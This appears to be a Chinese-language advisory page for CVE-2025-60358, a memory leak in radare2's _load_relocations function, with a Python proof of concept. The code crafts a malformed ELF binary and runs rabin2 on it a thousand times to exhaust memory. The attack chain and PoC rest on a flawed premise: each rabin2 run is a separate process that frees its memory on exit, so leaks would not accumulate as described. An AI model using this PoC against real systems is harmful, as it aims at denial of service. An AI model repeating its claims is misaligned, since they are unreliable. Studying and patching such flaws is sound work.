radare2 _load_relocations函数内存泄漏漏洞 (CVE-2025-60358)

漏洞信息

漏洞编号

CVE-2025-60358

漏洞类型

内存泄漏（Memory Leak）

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

radare2

漏洞概述

CVE-2025-60358是radare2逆向工程框架中存在的一个内存泄漏漏洞。该漏洞存在于radare2 5.9.8及之前的版本中，具体位于_load_relocations函数内部。radare2是一款广受欢迎的开源逆向工程框架和二进制分析工具，被安全研究人员、恶意软件分析师和漏洞挖掘人员广泛使用，用于静态分析、动态分析、调试和修改二进制文件。

该漏洞的根本原因是_load_relocations函数在处理二进制文件的重定位信息时，未能正确释放动态分配的内存资源，导致每次调用该函数时都会产生内存泄漏。虽然该漏洞的CVSS评分为5.5，属于中等严重等级，但其对系统可用性具有高影响（机密性影响为低、完整性影响为无、可用性影响为高）。攻击者需要具有本地低权限访问权限才能利用此漏洞，无需用户交互即可触发。

该漏洞的攻击向量为本地（AV:L），攻击复杂度低（AC:L），所需权限为低权限（PR:L），这意味着任何能够本地运行radare2工具的用户都有可能触发该漏洞。攻击者可以通过反复打开包含特定重定位信息的恶意构造二进制文件来持续消耗系统内存，最终可能导致系统因内存耗尽而拒绝服务（DoS）。该漏洞已于2025年10月16日公开披露，相关的修复补丁已在radare2的GitHub仓库中通过Pull Request #24224提交。

技术细节

radare2的_load_relocations函数负责解析和加载ELF、PE等可执行文件格式中的重定位（relocation）信息。重定位是二进制文件中用于支持动态链接和地址空间布局随机化（ASLR）的关键数据结构。

该漏洞的技术原理在于：当_load_relocations函数解析二进制文件的重定位节（relocation sections）时，会动态分配内存来存储重定位条目。然而，在某些代码路径上，特别是在错误处理或异常退出路径中，函数未能正确释放已分配的内存缓冲区。具体而言，当函数遇到无效的重定位数据或解析过程中发生错误时，可能直接返回而没有调用相应的释放函数（如free()），导致内存泄漏。

利用方式方面，攻击者可以精心构造一个包含畸形重定位信息的二进制文件（如ELF格式），然后使用radare2的rabin2工具或r2主程序加载该文件。每次加载该恶意文件时，_load_relocations函数都会被调用并泄漏一定量的内存。攻击者可以通过编写脚本反复触发文件加载过程，持续消耗系统内存资源。当系统可用内存耗尽时，将导致系统性能严重下降甚至完全不可用，从而实现本地拒绝服务攻击。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要在目标系统上具有本地低权限访问权限，并确保目标系统安装了受影响版本的radare2（5.9.8及之前版本）。

STEP 2

步骤2：构造恶意文件

攻击者精心构造一个包含畸形重定位信息的ELF二进制文件，使_load_relocations函数在解析过程中触发错误处理路径，导致内存无法被正确释放。

STEP 3

步骤3：触发漏洞

攻击者使用radare2工具（如rabin2、r2等）加载该恶意构造的二进制文件，触发_load_relocations函数的执行，每次调用都会泄漏一定量的内存。

STEP 4

步骤4：持续消耗内存

攻击者通过脚本反复触发文件加载操作，持续累积内存泄漏，逐步耗尽系统可用内存资源。

STEP 5

步骤5：拒绝服务

当系统内存资源被耗尽时，系统性能严重下降，最终可能导致系统崩溃或完全不可用，实现本地拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-60358 PoC - radare2 _load_relocations Memory Leak
# This PoC creates a malformed ELF binary with crafted relocation sections
# to trigger memory leak in radare2's _load_relocations function

import struct
import subprocess
import os
import sys

def create_malformed_elf(filename):
    """Create a malformed ELF binary with corrupted relocation sections"""
    # ELF Header (64-bit, little-endian)
    elf_header = bytearray()
    elf_header += b'\x7fELF'           # e_ident[EI_MAG] - ELF magic
    elf_header += b'\x02'              # e_ident[EI_CLASS] - 64-bit
    elf_header += b'\x01'              # e_ident[EI_DATA] - Little endian
    elf_header += b'\x01'              # e_ident[EI_VERSION] - Current version
    elf_header += b'\x00'              # e_ident[EI_OSABI] - System V
    elf_header += b'\x00' * 8          # e_ident[EI_ABIVERSION] + padding
    elf_header += struct.pack('<H', 2)  # e_type - ET_EXEC
    elf_header += struct.pack('<H', 62) # e_machine - EM_X86_64
    elf_header += struct.pack('<I', 1)  # e_version
    elf_header += struct.pack('<Q', 0x400000)  # e_entry
    elf_header += struct.pack('<Q', 64)  # e_phoff - program header offset
    elf_header += struct.pack('<Q', 200) # e_shoff - section header offset (malformed)
    elf_header += struct.pack('<I', 0)   # e_flags
    elf_header += struct.pack('<H', 64)  # e_ehsize
    elf_header += struct.pack('<H', 56)  # e_phentsize
    elf_header += struct.pack('<H', 1)   # e_phnum
    elf_header += struct.pack('<H', 64)  # e_shentsize
    elf_header += struct.pack('<H', 5)   # e_shnum - 5 section headers
    elf_header += struct.pack('<H', 4)   # e_shstrndx

    # Program Header
    phdr = bytearray()
    phdr += struct.pack('<I', 1)        # p_type - PT_LOAD
    phdr += struct.pack('<I', 5)        # p_flags - PF_R|PF_X
    phdr += struct.pack('<Q', 0)        # p_offset
    phdr += struct.pack('<Q', 0x400000) # p_vaddr
    phdr += struct.pack('<Q', 0x400000) # p_paddr
    phdr += struct.pack('<Q', 500)      # p_filesz
    phdr += struct.pack('<Q', 500)      # p_memsz
    phdr += struct.pack('<Q', 0x1000)   # p_align

    # Section Headers - Include malformed .rela.dyn section
    # Null section header
    sh_null = bytearray(64)

    # .text section
    sh_text = bytearray()
    sh_text += struct.pack('<I', 0)     # sh_name
    sh_text += struct.pack('<I', 1)     # sh_type - SHT_PROGBITS
    sh_text += struct.pack('<Q', 6)     # sh_flags - SHF_ALLOC|SHF_EXECINSTR
    sh_text += struct.pack('<Q', 0)     # sh_addr
    sh_text += struct.pack('<Q', 0)     # sh_offset
    sh_text += struct.pack('<Q', 100)   # sh_size
    sh_text += struct.pack('<I', 0)     # sh_link
    sh_text += struct.pack('<I', 0)     # sh_info
    sh_text += struct.pack('<Q', 16)    # sh_addralign
    sh_text += struct.pack('<Q', 0)     # sh_entsize

    # .rela.dyn section (malformed relocation section)
    sh_rela = bytearray()
    sh_rela += struct.pack('<I', 0)     # sh_name
    sh_rela += struct.pack('<I', 4)     # sh_type - SHT_RELA
    sh_rela += struct.pack('<Q', 2)     # sh_flags - SHF_ALLOC
    sh_rela += struct.pack('<Q', 200)   # sh_addr
    sh_rela += struct.pack('<Q', 200)   # sh_offset - pointing to malformed data
    sh_rela += struct.pack('<Q', 0xFFFF) # sh_size - intentionally large to cause leak
    sh_rela += struct.pack('<I', 0)     # sh_link
    sh_rela += struct.pack('<I', 0)     # sh_info
    sh_rela += struct.pack('<Q', 24)    # sh_addralign
    sh_rela += struct.pack('<Q', 24)    # sh_entsize

    # .shstrtab section
    sh_shstrtab = bytearray(64)

    # .dynsym section
    sh_dynsym = bytearray(64)

    # Write malformed relocation data
    reloc_data = bytearray()
    # Create invalid relocation entries to trigger error path in _load_relocations
    for i in range(100):
        reloc_data += struct.pack('<Q', 0xDEADBEEF)  # r_offset - invalid
        reloc_data += struct.pack('<Q', 0xFFFFFFFF)  # r_info - invalid type
        reloc_data += struct.pack('<q', -1)          # r_addend - invalid

    with open(filename, 'wb') as f:
        f.write(elf_header)
        f.write(phdr)
        f.write(b'\x00' * (200 - len(elf_header) - len(phdr)))  # padding
        f.write(reloc_data)
        f.write(sh_null)
        f.write(sh_text)
        f.write(sh_rela)
        f.write(sh_shstrtab)
        f.write(sh_dynsym)

def trigger_memory_leak(target_file, iterations=1000):
    """Repeatedly load the malformed file to trigger memory leak"""
    print(f"[*] Triggering memory leak with {iterations} iterations...")
    for i in range(iterations):
        try:
            # Use rabin2 to load and analyze the binary
            subprocess.run(
                ['rabin2', '-R', target_file],
                capture_output=True,
                timeout=5
            )
            if i % 100 == 0:
                print(f"[*] Iteration {i}/{iterations}")
        except subprocess.TimeoutExpired:
            pass
        except FileNotFoundError:
            print("[!] radare2/rabin2 not found. Please install radare2.")
            sys.exit(1)

if __name__ == '__main__':
    target = 'malformed_reloc.bin'
    print("[*] Creating malformed ELF binary...")
    create_malformed_elf(target)
    print(f"[*] Malformed binary saved as {target}")
    print("[*] Starting memory leak exploitation...")
    trigger_memory_leak(target)
    print("[*] Done. Check system memory usage.")
    os.remove(target)

影响范围

radare2 <= 5.9.8

防御指南

临时缓解措施

在官方发布修复版本之前，建议用户采取以下临时缓解措施：1）限制本地普通用户对radare2工具的访问权限，仅允许可信用户使用；2）在处理未知来源的二进制文件时，使用内存监控工具密切观察radare2进程的内存使用情况；3）避免在生产环境或关键系统中使用受影响版本的radare2；4）考虑使用替代的二进制分析工具或升级到radare2的最新开发版本；5）定期重启radare2相关服务以释放累积泄漏的内存。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60358
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60358
3 Details https://www.cvedetails.com/cve/CVE-2025-60358/
4 VulDB https://vuldb.com/cve/CVE-2025-60358
5 Link https://github.com/radareorg/radare2/pull/24224